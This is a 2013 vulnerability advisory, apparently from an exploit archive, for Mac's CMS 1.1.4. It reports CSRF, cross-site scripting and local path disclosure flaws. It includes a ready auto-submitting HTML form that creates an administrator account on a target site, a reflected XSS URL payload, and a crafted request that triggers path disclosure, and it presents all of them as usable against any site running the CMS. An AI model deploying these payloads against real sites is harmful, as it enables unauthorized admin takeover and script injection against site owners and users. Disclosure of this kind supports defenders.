Mac's CMS - Multiple vilnerabilities

2013-08-15 / 2013-08-16
Credit: Yashar shahinzadeh
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352

##################################### # Exploit Title: Mac's CMS - Multiple vilnerabilities # Date: 2013 14 August # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: http://macs-framework.sourceforge.net/ # Tested on: Linux & Windows, PHP 5.3.4 # Affected Version : 1.1.4 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } #################################### Summary: ======== 1. CSRF - Adding/Editing administrator account 2. Cross site scripting 3. Local path disclosure 1. CSRF - Adding/Editing administrator account: =============================================== Following exploits can be used against any site installed "Mac's CMS", after a successful attack a text containing "User: yashar was added successfully. Click Here to update your view" will be appeared. I only illustrate the adding user, editing is similar. <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://server/index.php/main/cms/saveUser" method="post"> <input type="hidden" name="ajaxRequest" value="true"> <input type="hidden" name="username" value="yashar"> <input type="hidden" name="password" value="yashar"> <input type="hidden" name="confirmPassword" value="yashar"> <input type="hidden" name="emailAddress" value="y.shahinzadeh@gmail.com"> <input type="hidden" name="roleId" value="1"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> 2. Cross site scripting: ======================== There are too many XSS (Reflected and stored) in this CMS, I will provide an live example: http://server/libs/standalone/whois/example.php/%22%3E%3Cscript%3Ealert%28%27123%27%29%3C/script%3E 3. Local path disclosure: ========================= There are some pages that are big leads to knowing local path, the path is valuable and can be used in Injection and... I would give an instance only: http://server/index.php/main/cms/getComments/?controller=main&function=index&pageIndex[$test]=1&paginationKey=comments /** Yasshar shahinzadeh **/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top